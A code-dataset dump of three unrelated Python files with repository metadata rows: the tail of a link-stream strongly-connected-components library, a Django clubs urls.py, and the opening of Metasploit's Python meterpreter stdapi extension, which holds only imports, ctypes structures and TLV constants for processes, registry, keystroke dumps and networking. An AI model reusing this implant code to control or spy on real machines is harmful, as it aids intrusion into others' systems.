cnt_scc_id=cnt_scc_id,
format=format, streaming_output=streaming_output
)
else:
node_2_status[u][0] += 1
node_2_status[v][0] += 1
current_comp = tmp_components[node_2_status[u][1]]
current_comp.add_link(l)
return cnt_scc_id
def process_batch_link_departure(batch, node_2_status, tmp_components,
final_components, cnt_scc_id, condensation_dag=None,
format="cluster",
streaming_output=None):
"""
:param streaming_output:
:param batch:
:param node_2_status:
:param tmp_components:
:param final_components:
:param condensation_dag:
:param format:
:param cnt_scc_id:
:return:
"""
id_comp_to_split = set()
id_comp_to_close = set()
nodes_to_remove = set()
t1 = batch[0][1]
for l in batch:
u, v = l[2], l[3]
node_2_status[u][0] -= 1
node_2_status[v][0] -= 1
id_comp = node_2_status[u][1]
comp = tmp_components[id_comp]
comp.remove_link((u, v))
# By default we split the component
if node_2_status[u][0] == 0 or node_2_status[v][0] == 0:
# If it's a node's departure, there are several cases:
# 1. No more links in the components (it's empty)
if not comp.active_links:
cnt_scc_id = close_component(comp, t1, final_components, cnt_scc_id, condensation_dag=condensation_dag,
format=format, streaming_output=streaming_output)
tmp_components[id_comp] = None
id_comp_to_split.discard(id_comp)
id_comp_to_close.discard(id_comp)
del node_2_status[u]
del node_2_status[v]
# 2. A node left but there are still some nodes inside (and other departures to come)
else:
if node_2_status[u][0] == 0:
id_comp_to_close.add(id_comp)
nodes_to_remove.add(u)
del node_2_status[u]
if node_2_status[v][0] == 0:
id_comp_to_close.add(id_comp)
nodes_to_remove.add(v)
del node_2_status[v]
else:
id_comp_to_split.add(id_comp)
for id_comp in id_comp_to_split:
comp = tmp_components[id_comp]
if comp.active_links:
R = comp.split()
if R:
# We close the current component :)
cnt_scc_id = close_component(comp, t1, final_components, cnt_scc_id, condensation_dag=condensation_dag,
format=format, streaming_output=streaming_output)
tmp_components[id_comp] = None
id_comp_to_close.discard(id_comp)
for C in R:
# New components
# assert is_connected(C)
C.set_begin_time(t1) # set new begin time
new_id_comp = len(tmp_components)
for n in C.nodes:
node_2_status[n][1] = new_id_comp
# predecessor_in_dag_tmp[len(tmp_components)] += [cnt_scc_id - 1] # previous closed component
tmp_components.append(C) # append the new component
# Id comp to close is necessary.
for id_comp in id_comp_to_close:
comp = tmp_components[id_comp]
cnt_scc_id = close_component(comp, t1, final_components, cnt_scc_id, condensation_dag=condensation_dag,
format=format, streaming_output=streaming_output)
comp.nodes -= nodes_to_remove
if comp.nodes:
comp.set_begin_time(t1) # A node left but others are still present.
else:
raise ValueError("Starfoullah")
return cnt_scc_id
def close_component(comp,
t,
final_components,
cnt_scc_id,
condensation_dag=None,
format="cluster",
streaming_output=None):
"""
Close current component
:param streaming_output:
:param comp:
:param t:
:param final_components:
:param cnt_scc_id:
:param condensation_dag:
:param format:
:return:
"""
c = None
if format == "object" or format == "object_with_links":
copy_comp = copy.copy(comp)
copy_comp.set_end_time(t) # Put an end time to the previous component
copy_comp.id = cnt_scc_id
final_components.append(copy_comp)
c = copy_comp
elif format == "cluster":
c = [(comp.times[0], t, n) for n in comp.nodes]
final_components.append(c)
elif format == "streaming":
n_nodes = len(comp.nodes)
if streaming_output:
streaming_output.write(str(comp.times[0]) + ";" + str(t) + ";" + str(n_nodes))
streaming_output.write("\n")
else:
c = (comp.times[0], t, n_nodes)
final_components.append(c)
if condensation_dag:
condensation_dag.add_node(c)
cnt_scc_id += 1
return cnt_scc_id
class StronglyConnectedComponent(ConnectedComponent):
def __init__(self,
id=None,
times=None,
nodes=None,
active_links=None,
links=None
):
"""
A basic constructor for a strongly connected component object
:param id: an identifier
:param times: [beginning time, ending time]
:param nodes: A set of nodes present in the component
:param active_links: A set of links present in the component (Only useful during components computation)
:param links: a list of 'segmented' links
"""
super().__init__(id, times, nodes, active_links, links)
def __repr__(self):
rep = "Id SCC :" + str(self.id) + " time window :" + str(self.times) + "\n"
rep += "Nodes :" + str(self.nodes) + "\n"
rep += "Links :" + str(self.links) + "\n"
return rep
def __copy__(self):
comp_copy = StronglyConnectedComponent()
comp_copy.times = copy.copy(self.times)
if self.links:
comp_copy.links = [copy.copy(l) for l in self.links]
else:
comp_copy.links = None
comp_copy.nodes = copy.copy(self.nodes)
return comp_copy
def split(self):
R = super().split() # (current_nodes,current_links,active_links)
return [StronglyConnectedComponent(nodes=c[0],
links=c[1],
active_links=c[2]) for c in R]
def get_stable_components(self, format="object"):
"""
Compute the stable connected components included in the current ``StronglyConnectedComponent``
:param format: output format ("object", "object_with_links" or "cluster")
:return: A list of ``StableConnectedComponents`` objects
"""
stable_components = []
if self.links and len(self.get_interactions_times()) > 1:
interact_times = self.get_interactions_times()
time_to_pos = {t: i for i, t in enumerate(interact_times)}
inter_nodes = [set() for _ in range(len(interact_times) - 1)]
inter_links = [[] for _ in range(len(interact_times) - 1)]
for l in self.links:
t0, t1, u, v = l
t0 = max(t0, self.times[0])
t1 = min(t1, self.times[1])
for i in range(time_to_pos[t0], time_to_pos[t1]):
inter_nodes[i].add(u)
inter_nodes[i].add(v)
inter_links[i].append((t0, t1, u, v))
if format == "object" or format == "object_with_links":
for j in range(len(interact_times) - 1):
c = StronglyConnectedComponent(id=(self.id, j),
times=(interact_times[j], interact_times[j + 1]),
nodes=set(inter_nodes[time_to_pos[interact_times[j]]]),
links=list(inter_links[time_to_pos[interact_times[j]]]))
stable_components.append(c)
if format == "cluster":
for j in range(len(interact_times) - 1):
c = [(interact_times[j], interact_times[j + 1], u) for u in
inter_nodes[time_to_pos[interact_times[j]]]]
stable_components.append(c)
else:
if format == "object" or format == "object_with_links":
if self.links:
stable_components = [StronglyConnectedComponent(id=self.id,
times=self.times,
nodes=self.nodes,
links=self.links)]
else:
stable_components = [StronglyConnectedComponent(id=self.id,
times=self.times,
nodes=self.nodes)]
if format == "cluster":
stable_components = [[(self.times[0], self.times[1], u) for u in self.nodes]]
return stable_components
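# Illustrative example (assuming links are (t0, t1, u, v) tuples as above): an
# SCC over [0, 10] with links [(0, 4, 'a', 'b'), (4, 10, 'b', 'c')] has
# interaction times [0, 4, 10], so get_stable_components() yields one stable
# component on [0, 4] with nodes {'a', 'b'} and one on [4, 10] with {'b', 'c'}.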
| 41.498915 | 119 | 0.545188 | 2,272 | 19,131 | 4.310299 | 0.109155 | 0.024507 | 0.053916 | 0.049015 | 0.493618 | 0.406311 | 0.391913 | 0.354233 | 0.332789 | 0.298785 | 0 | 0.016453 | 0.370969 | 19,131 | 460 | 120 | 41.58913 | 0.797324 | 0.181172 | 0 | 0.394904 | 0 | 0 | 0.018449 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038217 | false | 0 | 0.009554 | 0 | 0.085987 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b565d06a318c1ffd0a345b62d8fede899d0d6ae | 593 | py | Python | clubs/urls.py | DarkoR12/dafi-system | f923ea4273b04f7acc7016b2f7d03e51eb00b85b | [
"MIT"
] | null | null | null | clubs/urls.py | DarkoR12/dafi-system | f923ea4273b04f7acc7016b2f7d03e51eb00b85b | [
"MIT"
] | null | null | null | clubs/urls.py | DarkoR12/dafi-system | f923ea4273b04f7acc7016b2f7d03e51eb00b85b | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
app_name = 'clubs'
urlpatterns = [
path('', views.IndexView.as_view(), name='list'),
path('<str:slug>/quedadas/agregar/', views.MeetingAddView.as_view(), name='meeting_add'),
path('<str:slug>/quedadas/<int:pk>/editar/', views.MeetingEditView.as_view(), name='meeting_edit'),
path('<str:slug>/quedadas/<int:pk>/eliminar/', views.MeetingDeleteView.as_view(), name='meeting_delete'),
path('<str:slug>/editar/', views.ClubEditView.as_view(), name='edit'),
path('<str:slug>/', views.DetailView.as_view(), name='detail')
]
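# Illustrative usage (not part of the original file): because app_name is set
# to 'clubs', these routes are reversed with the namespace prefix, e.g.:
#
#     from django.urls import reverse
#     reverse('clubs:detail', kwargs={'slug': 'ajedrez'})
#     # -> '/ajedrez/'
#     reverse('clubs:meeting_edit', kwargs={'slug': 'ajedrez', 'pk': 3})
#     # -> '/ajedrez/quedadas/3/editar/'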
| 39.533333 | 109 | 0.686341 | 78 | 593 | 5.089744 | 0.410256 | 0.09068 | 0.151134 | 0.143577 | 0.120907 | 0.120907 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10118 | 593 | 14 | 110 | 42.357143 | 0.744841 | 0 | 0 | 0 | 0 | 0 | 0.315346 | 0.172007 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b5ae56a59d6f555b497604a51656a981c483354 | 60,639 | py | Python | data/meterpreter/ext_server_stdapi.py | madhavarao-yejarla/VoIP | 3f7d0cdc0bb1423f9e952e411d073a1424ef9f5e | [
"Apache-2.0",
"BSD-3-Clause"
] | 35 | 2015-08-08T07:23:38.000Z | 2021-04-07T18:00:44.000Z | data/meterpreter/ext_server_stdapi.py | madhavarao-yejarla/VoIP | 3f7d0cdc0bb1423f9e952e411d073a1424ef9f5e | [
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2019-02-12T12:13:53.000Z | 2019-02-12T12:13:53.000Z | data/meterpreter/ext_server_stdapi.py | fozavci/metasploit-framework-with-viproy | 3f7d0cdc0bb1423f9e952e411d073a1424ef9f5e | [
"Apache-2.0",
"BSD-3-Clause"
] | 23 | 2015-08-11T05:07:47.000Z | 2020-11-06T03:55:10.000Z | import fnmatch
import getpass
import os
import platform
import shlex
import shutil
import socket
import struct
import subprocess
import sys
import time
try:
import ctypes
has_ctypes = True
has_windll = hasattr(ctypes, 'windll')
except ImportError:
has_ctypes = False
has_windll = False
try:
import pty
has_pty = True
except ImportError:
has_pty = False
try:
import pwd
has_pwd = True
except ImportError:
has_pwd = False
try:
import SystemConfiguration as osxsc
has_osxsc = True
except ImportError:
has_osxsc = False
try:
import termios
has_termios = True
except ImportError:
has_termios = False
try:
import _winreg as winreg
has_winreg = True
except ImportError:
has_winreg = False
try:
import winreg
has_winreg = True
except ImportError:
has_winreg = (has_winreg or False)
if sys.version_info[0] < 3:
is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00'
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
else:
if isinstance(__builtins__, dict):
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
str = lambda x: __builtins__['str'](x, 'UTF-8')
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
str = lambda x: __builtins__.str(x, 'UTF-8')
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
NULL_BYTE = bytes('\x00', 'UTF-8')
long = int
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)
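# Quick sanity sketch of the shims above (illustrative): on Python 2, bytes()
# degrades to str and NULL_BYTE is the str '\x00'; on Python 3, str() decodes
# UTF-8 bytes and NULL_BYTE is b'\x00'. On either major version:
#
#     is_str('abc')                        # True
#     unicode(bytes('a', 'UTF-8')) == 'a'  # True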
if has_ctypes:
#
# Windows Structures
#
class SOCKADDR(ctypes.Structure):
_fields_ = [("sa_family", ctypes.c_ushort),
("sa_data", (ctypes.c_uint8 * 14))]
class SOCKET_ADDRESS(ctypes.Structure):
_fields_ = [("lpSockaddr", ctypes.POINTER(SOCKADDR)),
("iSockaddrLength", ctypes.c_int)]
class IP_ADAPTER_UNICAST_ADDRESS(ctypes.Structure):
_fields_ = [
("s", type(
'_s_IP_ADAPTER_UNICAST_ADDRESS',
(ctypes.Structure,),
dict(_fields_ = [
("Length", ctypes.c_ulong),
("Flags", ctypes.c_uint32)
])
)),
("Next", ctypes.c_void_p),
("Address", SOCKET_ADDRESS),
("PrefixOrigin", ctypes.c_uint32),
("SuffixOrigin", ctypes.c_uint32),
("DadState", ctypes.c_uint32),
("ValidLifetime", ctypes.c_ulong),
("PreferredLifetime", ctypes.c_ulong),
("LeaseLifetime", ctypes.c_ulong),
("OnLinkPrefixLength", ctypes.c_uint8)]
class IP_ADAPTER_ADDRESSES(ctypes.Structure):
_fields_ = [
("u", type(
'_u_IP_ADAPTER_ADDRESSES',
(ctypes.Union,),
dict(_fields_ = [
("Alignment", ctypes.c_ulonglong),
("s", type(
'_s_IP_ADAPTER_ADDRESSES',
(ctypes.Structure,),
dict(_fields_ = [
("Length", ctypes.c_ulong),
("IfIndex", ctypes.c_uint32)
])
))
])
)),
("Next", ctypes.c_void_p),
("AdapterName", ctypes.c_char_p),
("FirstUnicastAddress", ctypes.c_void_p),
("FirstAnycastAddress", ctypes.c_void_p),
("FirstMulticastAddress", ctypes.c_void_p),
("FirstDnsServerAddress", ctypes.c_void_p),
("DnsSuffix", ctypes.c_wchar_p),
("Description", ctypes.c_wchar_p),
("FriendlyName", ctypes.c_wchar_p),
("PhysicalAddress", (ctypes.c_uint8 * 8)),
("PhysicalAddressLength", ctypes.c_uint32),
("Flags", ctypes.c_uint32),
("Mtu", ctypes.c_uint32),
("IfType", ctypes.c_uint32),
("OperStatus", ctypes.c_uint32),
("Ipv6IfIndex", ctypes.c_uint32),
("ZoneIndices", (ctypes.c_uint32 * 16)),
("FirstPrefix", ctypes.c_void_p),
("TransmitLinkSpeed", ctypes.c_uint64),
("ReceiveLinkSpeed", ctypes.c_uint64),
("FirstWinsServerAddress", ctypes.c_void_p),
("FirstGatewayAddress", ctypes.c_void_p),
("Ipv4Metric", ctypes.c_ulong),
("Ipv6Metric", ctypes.c_ulong),
("Luid", ctypes.c_uint64),
("Dhcpv4Server", SOCKET_ADDRESS),
("CompartmentId", ctypes.c_uint32),
("NetworkGuid", (ctypes.c_uint8 * 16)),
("ConnectionType", ctypes.c_uint32),
("TunnelType", ctypes.c_uint32),
("Dhcpv6Server", SOCKET_ADDRESS),
("Dhcpv6ClientDuid", (ctypes.c_uint8 * 130)),
("Dhcpv6ClientDuidLength", ctypes.c_ulong),
("Dhcpv6Iaid", ctypes.c_ulong),
("FirstDnsSuffix", ctypes.c_void_p)]
class MIB_IFROW(ctypes.Structure):
_fields_ = [("wszName", (ctypes.c_wchar * 256)),
("dwIndex", ctypes.c_uint32),
("dwType", ctypes.c_uint32),
("dwMtu", ctypes.c_uint32),
("dwSpeed", ctypes.c_uint32),
("dwPhysAddrLen", ctypes.c_uint32),
("bPhysAddr", (ctypes.c_uint8 * 8)),
("dwAdminStatus", ctypes.c_uint32),
("dwOperStaus", ctypes.c_uint32),
("dwLastChange", ctypes.c_uint32),
("dwInOctets", ctypes.c_uint32),
("dwInUcastPkts", ctypes.c_uint32),
("dwInNUcastPkts", ctypes.c_uint32),
("dwInDiscards", ctypes.c_uint32),
("dwInErrors", ctypes.c_uint32),
("dwInUnknownProtos", ctypes.c_uint32),
("dwOutOctets", ctypes.c_uint32),
("dwOutUcastPkts", ctypes.c_uint32),
("dwOutNUcastPkts", ctypes.c_uint32),
("dwOutDiscards", ctypes.c_uint32),
("dwOutErrors", ctypes.c_uint32),
("dwOutQLen", ctypes.c_uint32),
("dwDescrLen", ctypes.c_uint32),
("bDescr", (ctypes.c_char * 256))]
class MIB_IPADDRROW(ctypes.Structure):
_fields_ = [("dwAddr", ctypes.c_uint32),
("dwIndex", ctypes.c_uint32),
("dwMask", ctypes.c_uint32),
("dwBCastAddr", ctypes.c_uint32),
("dwReasmSize", ctypes.c_uint32),
("unused1", ctypes.c_uint16),
("wType", ctypes.c_uint16)]
class PROCESSENTRY32(ctypes.Structure):
_fields_ = [("dwSize", ctypes.c_uint32),
("cntUsage", ctypes.c_uint32),
("th32ProcessID", ctypes.c_uint32),
("th32DefaultHeapID", ctypes.c_void_p),
("th32ModuleID", ctypes.c_uint32),
("cntThreads", ctypes.c_uint32),
("th32ParentProcessID", ctypes.c_uint32),
("thPriClassBase", ctypes.c_int32),
("dwFlags", ctypes.c_uint32),
("szExeFile", (ctypes.c_char * 260))]
class SID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [("Sid", ctypes.c_void_p),
("Attributes", ctypes.c_uint32)]
class SYSTEM_INFO(ctypes.Structure):
_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
("wReserved", ctypes.c_uint16),
("dwPageSize", ctypes.c_uint32),
("lpMinimumApplicationAddress", ctypes.c_void_p),
("lpMaximumApplicationAddress", ctypes.c_void_p),
("dwActiveProcessorMask", ctypes.c_uint32),
("dwNumberOfProcessors", ctypes.c_uint32),
("dwProcessorType", ctypes.c_uint32),
("dwAllocationGranularity", ctypes.c_uint32),
("wProcessorLevel", ctypes.c_uint16),
("wProcessorRevision", ctypes.c_uint16)]
class TOKEN_USER(ctypes.Structure):
_fields_ = [("User", SID_AND_ATTRIBUTES)]
#
# Linux Structures
#
class IFADDRMSG(ctypes.Structure):
_fields_ = [("family", ctypes.c_uint8),
("prefixlen", ctypes.c_uint8),
("flags", ctypes.c_uint8),
("scope", ctypes.c_uint8),
("index", ctypes.c_int32)]
class IFINFOMSG(ctypes.Structure):
_fields_ = [("family", ctypes.c_uint8),
("pad", ctypes.c_int8),
("type", ctypes.c_uint16),
("index", ctypes.c_int32),
("flags", ctypes.c_uint32),
("chagen", ctypes.c_uint32)]
class NLMSGHDR(ctypes.Structure):
_fields_ = [("len", ctypes.c_uint32),
("type", ctypes.c_uint16),
("flags", ctypes.c_uint16),
("seq", ctypes.c_uint32),
("pid", ctypes.c_uint32)]
class RTATTR(ctypes.Structure):
_fields_ = [("len", ctypes.c_uint16),
("type", ctypes.c_uint16)]
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
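# Example decomposition (illustrative): every specific TLV type below is a
# meta type OR'd with a small identifier, so the meta type can be recovered
# with the mask. For TLV_TYPE_PID = TLV_META_TYPE_UINT | 2300:
#
#     (TLV_TYPE_PID & TLV_META_TYPE_MASK) == TLV_META_TYPE_UINT   # True
#     (TLV_TYPE_PID & ~TLV_META_TYPE_MASK) == 2300                # True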
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
##
# General
##
TLV_TYPE_HANDLE = TLV_META_TYPE_QWORD | 600
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_QWORD | 630
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_QWORD | 631
##
# Fs
##
TLV_TYPE_DIRECTORY_PATH = TLV_META_TYPE_STRING | 1200
TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201
TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202
TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203
TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204
TLV_TYPE_FILE_HASH = TLV_META_TYPE_RAW | 1206
TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220
TLV_TYPE_SEARCH_RECURSE = TLV_META_TYPE_BOOL | 1230
TLV_TYPE_SEARCH_GLOB = TLV_META_TYPE_STRING | 1231
TLV_TYPE_SEARCH_ROOT = TLV_META_TYPE_STRING | 1232
TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233
##
# Net
##
TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400
TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401
TLV_TYPE_INTERFACE_MTU = TLV_META_TYPE_UINT | 1402
TLV_TYPE_INTERFACE_FLAGS = TLV_META_TYPE_STRING | 1403
TLV_TYPE_INTERFACE_INDEX = TLV_META_TYPE_UINT | 1404
TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420
TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421
TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422
TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423
TLV_TYPE_IP_PREFIX = TLV_META_TYPE_UINT | 1424
TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430
TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431
TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432
TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
TLV_TYPE_IP6_SCOPE = TLV_META_TYPE_RAW | 1434
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
##
# Socket
##
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
TLV_TYPE_CONNECT_RETRIES = TLV_META_TYPE_UINT | 1504
TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530
##
# Registry
##
TLV_TYPE_HKEY = TLV_META_TYPE_QWORD | 1000
TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY
TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001
TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002
TLV_TYPE_KEY_NAME = TLV_META_TYPE_STRING | 1003
TLV_TYPE_VALUE_NAME = TLV_META_TYPE_STRING | 1010
TLV_TYPE_VALUE_TYPE = TLV_META_TYPE_UINT | 1011
TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012
TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013
##
# Config
##
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
TLV_TYPE_SID = TLV_META_TYPE_STRING | 1045
##
# Environment
##
TLV_TYPE_ENV_VARIABLE = TLV_META_TYPE_STRING | 1100
TLV_TYPE_ENV_VALUE = TLV_META_TYPE_STRING | 1101
TLV_TYPE_ENV_GROUP = TLV_META_TYPE_GROUP | 1102
DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
##
# Process
##
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_QWORD | 2000
TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001
TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002
TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003
TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004
TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_QWORD | 2005
TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006
TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007
TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008
TLV_TYPE_PID = TLV_META_TYPE_UINT | 2300
TLV_TYPE_PROCESS_NAME = TLV_META_TYPE_STRING | 2301
TLV_TYPE_PROCESS_PATH = TLV_META_TYPE_STRING | 2302
TLV_TYPE_PROCESS_GROUP = TLV_META_TYPE_GROUP | 2303
TLV_TYPE_PROCESS_FLAGS = TLV_META_TYPE_UINT | 2304
TLV_TYPE_PROCESS_ARGUMENTS = TLV_META_TYPE_STRING | 2305
TLV_TYPE_PROCESS_ARCH = TLV_META_TYPE_UINT | 2306
TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307
TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400
TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401
TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402
TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_QWORD | 2403
TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_QWORD | 2404
TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405
TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406
TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500
TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502
TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510
TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_QWORD | 2511
TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_QWORD | 2512
TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513
TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540
TLV_TYPE_REGISTER_SIZE = TLV_META_TYPE_UINT | 2541
TLV_TYPE_REGISTER_VALUE_32 = TLV_META_TYPE_UINT | 2542
TLV_TYPE_REGISTER = TLV_META_TYPE_GROUP | 2550
##
# Ui
##
TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000
TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001
TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
##
# Event Log
##
TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000
TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_QWORD | 4001
TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002
TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003
TLV_TYPE_EVENT_RECORDOFFSET = TLV_META_TYPE_UINT | 4004
TLV_TYPE_EVENT_RECORDNUMBER = TLV_META_TYPE_UINT | 4006
TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT | 4007
TLV_TYPE_EVENT_TIMEWRITTEN = TLV_META_TYPE_UINT | 4008
TLV_TYPE_EVENT_ID = TLV_META_TYPE_UINT | 4009
TLV_TYPE_EVENT_TYPE = TLV_META_TYPE_UINT | 4010
TLV_TYPE_EVENT_CATEGORY = TLV_META_TYPE_UINT | 4011
TLV_TYPE_EVENT_STRING = TLV_META_TYPE_STRING | 4012
TLV_TYPE_EVENT_DATA = TLV_META_TYPE_RAW | 4013
##
# Power
##
TLV_TYPE_POWER_FLAGS = TLV_META_TYPE_UINT | 4100
TLV_TYPE_POWER_REASON = TLV_META_TYPE_UINT | 4101
##
# Sys
##
PROCESS_EXECUTE_FLAG_HIDDEN = (1 << 0)
PROCESS_EXECUTE_FLAG_CHANNELIZED = (1 << 1)
PROCESS_EXECUTE_FLAG_SUSPENDED = (1 << 2)
PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN = (1 << 3)
PROCESS_ARCH_UNKNOWN = 0
PROCESS_ARCH_X86 = 1
PROCESS_ARCH_X64 = 2
PROCESS_ARCH_IA64 = 3
##
# Errors
##
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
# Special return value to match up with Windows error codes for network
# errors.
ERROR_CONNECTION_ERROR = 10000
# Windows Constants
GAA_FLAG_SKIP_ANYCAST = 0x0002
GAA_FLAG_SKIP_MULTICAST = 0x0004
GAA_FLAG_INCLUDE_PREFIX = 0x0010
GAA_FLAG_SKIP_DNS_SERVER = 0x0080
PROCESS_TERMINATE = 0x0001
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
